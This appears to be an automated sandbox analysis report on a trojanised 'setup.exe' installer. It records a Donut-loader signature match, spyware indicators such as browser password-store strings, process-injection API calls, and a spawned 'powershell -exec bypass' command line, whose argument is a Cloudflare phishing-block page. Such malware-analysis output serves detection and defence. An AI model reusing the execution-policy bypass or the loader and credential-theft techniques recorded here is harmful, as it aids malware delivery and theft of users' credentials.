Source: setup.exe, 00000000.00000003.1873849376.0000000004014000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: setup.exe, 00000000.00000003.1920404383.000000000409A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: setup.exe, 00000000.00000003.1920404383.000000000409A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: setup.exe, 00000000.00000003.1873849376.0000000004012000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1896336808.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1874027282.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1895947194.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: setup.exe, 00000000.00000003.1874027282.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: setup.exe, 00000000.00000003.1873849376.0000000004012000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1896336808.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1874027282.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1895947194.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: setup.exe, 00000000.00000003.1874027282.0000000003FA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: powershell.exe, 00000004.00000002.2037317658.000000000489D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: powershell.exe, 00000004.00000002.2037317658.0000000004927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landinghZ
Source: powershell.exe, 00000004.00000002.2034614005.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2034614005.000000000057F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2034614005.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2036137758.0000000002810000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2046294844.0000000006DB7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2037156207.0000000004140000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blank
Source: powershell.exe, 00000004.00000002.2034614005.00000000004EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landingmance
Source: powershell.exe, 00000004.00000002.2037317658.0000000004927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phish
Source: powershell.exe, 00000004.00000002.2037317658.0000000004927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishhZ
Source: powershell.exe, 00000004.00000002.2037317658.0000000004927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-atX)
Source: powershell.exe, 00000004.00000002.2037317658.000000000489D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: powershell.exe, 00000004.00000002.2034614005.00000000004EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2034614005.000000000057F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2034614005.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2036137758.0000000002810000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2037156207.0000000004140000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-c
Source: setup.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1873160478.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: setup.exe, 00000000.00000003.1872572516.0000000003FBA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1872838926.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1873160478.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: setup.exe, 00000000.00000003.1920404383.000000000409A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: setup.exe, 00000000.00000003.1920404383.000000000409A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: setup.exe, 00000000.00000003.1920404383.000000000409A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: setup.exe, 00000000.00000003.1920404383.000000000409A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: setup.exe, 00000000.00000003.1920404383.000000000409A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: setup.exe String found in binary or memory: https://www.winxdvd.com/
Source: setup.exe String found in binary or memory: https://www.winxdvd.com/Help_Filehelp.chm.chmhelpopenInit_CDROMCD-ROM
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.187.214:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.191.144:443 -> 192.168.2.4:49744 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2031955303.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0112C909 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread, 0_2_0112C909
Detected potential crypto function
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E0349 0_2_010E0349
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0112C909 0_2_0112C909
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E5116 0_2_010E5116
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E7126 0_2_010E7126
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010FF136 0_2_010FF136
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E0000 0_2_010E0000
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111502D 0_2_0111502D
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E4326 0_2_010E4326
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110B366 0_2_0110B366
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01118366 0_2_01118366
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_011023B6 0_2_011023B6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010FF3C6 0_2_010FF3C6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_011093E6 0_2_011093E6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010EE216 0_2_010EE216
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01117236 0_2_01117236
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01112226 0_2_01112226
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111E296 0_2_0111E296
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_011062B6 0_2_011062B6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010ED52D 0_2_010ED52D
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010F55A8 0_2_010F55A8
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111E5B6 0_2_0111E5B6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010F844E 0_2_010F844E
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010F248F 0_2_010F248F
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010EC486 0_2_010EC486
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111572E 0_2_0111572E
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01107745 0_2_01107745
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010FE656 0_2_010FE656
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111A676 0_2_0111A676
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110D69B 0_2_0110D69B
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111E916 0_2_0111E916
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010FE926 0_2_010FE926
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110B996 0_2_0110B996
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01116986 0_2_01116986
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_011179B6 0_2_011179B6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E79A6 0_2_010E79A6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010F19C1 0_2_010F19C1
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01110856 0_2_01110856
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010EAB16 0_2_010EAB16
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E5AC6 0_2_010E5AC6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010FED36 0_2_010FED36
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01106D76 0_2_01106D76
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01108DC5 0_2_01108DC5
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E8C16 0_2_010E8C16
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010FAC26 0_2_010FAC26
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111EC96 0_2_0111EC96
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010EFF26 0_2_010EFF26
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01102F46 0_2_01102F46
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110EF7B 0_2_0110EF7B
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E9F96 0_2_010E9F96
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010F2FB6 0_2_010F2FB6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_01116FD6 0_2_01116FD6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010F7FD6 0_2_010F7FD6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110CE07 0_2_0110CE07
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110DE27 0_2_0110DE27
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E7E36 0_2_010E7E36
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110DE76 0_2_0110DE76
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0110DE64 0_2_0110DE64
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_0111AEB6 0_2_0111AEB6
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010EAEE6 0_2_010EAEE6
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\setup.exe Code function: String function: 010F5586 appears 64 times
Source: C:\Users\user\Desktop\setup.exe Code function: String function: 010E97D6 appears 68 times
PE / OLE file has an invalid certificate
Source: setup.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: setup.exe, 00000000.00000000.1705755543.0000000000929000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs setup.exe
Source: setup.exe, 00000000.00000000.1705755543.0000000000929000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs setup.exe
Source: setup.exe, 00000000.00000003.1814572074.00000000036CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs setup.exe
Source: setup.exe, 00000000.00000003.1814572074.00000000036CE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs setup.exe
Source: setup.exe, 00000000.00000000.1705974730.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename" vs setup.exe
Source: setup.exe, 00000000.00000003.1814572074.0000000003EF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename" vs setup.exe
Source: setup.exe Binary or memory string: OriginalFileName vs setup.exe
Source: setup.exe Binary or memory string: CCompanyNameFileDescriptionFileVersionInternalNameLegalCopyrightLegalTradeMarksOriginalFileNameProductNameProductVersionComments\VarFileInfo\TranslationStringFileInfo\%04x%04x\map/set<T> too longinvalid map/set<T> iterator vs setup.exe
Source: setup.exe Binary or memory string: OriginalFilename" vs setup.exe
Uses 32bit PE files
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Very long command line found
Source: C:\Users\user\Desktop\setup.exe Process created: Commandline size = 4588
Source: C:\Users\user\Desktop\setup.exe Process created: Commandline size = 4588 Jump to behavior
Yara signature match
Source: 00000000.00000002.2031955303.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@2/2
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_010E0A59 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle, 0_2_010E0A59
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_su3a0sij.kp2.ps1 Jump to behavior
Source: Yara match File source: setup.exe, type: SAMPLE
Source: Yara match File source: 0.0.setup.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1704955473.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1814572074.00000000036CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: setup.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: setup.exe, 00000000.00000003.1873374234.0000000003FA5000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1896157425.0000000003F89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: setup.exe ReversingLabs: Detection: 15%
Source: setup.exe Virustotal: Detection: 19%
Source: setup.exe String found in binary or memory: dvcmnt.exe /install {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}
Source: setup.exe String found in binary or memory: CIsoMounterMsgFuncdvcmnt.exe /install {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}:%c"dvcmnt.exe" /list {F4393EB2-F14D-4baf-B3CC-D25E30762D8B}%i
Source: setup.exe String found in binary or memory: Please re-install software!DC_MSG_FINISHinvalid vector<T> subscript|3D
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="71Za1bMT4p7rZalhixa.l.bxuLqtqavi.hc0woY.dYQ-1734782322-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="71Za1bMT4p7rZalhixa.l.bxuLqtqavi.hc0woY.dYQ-1734782322-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> < Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
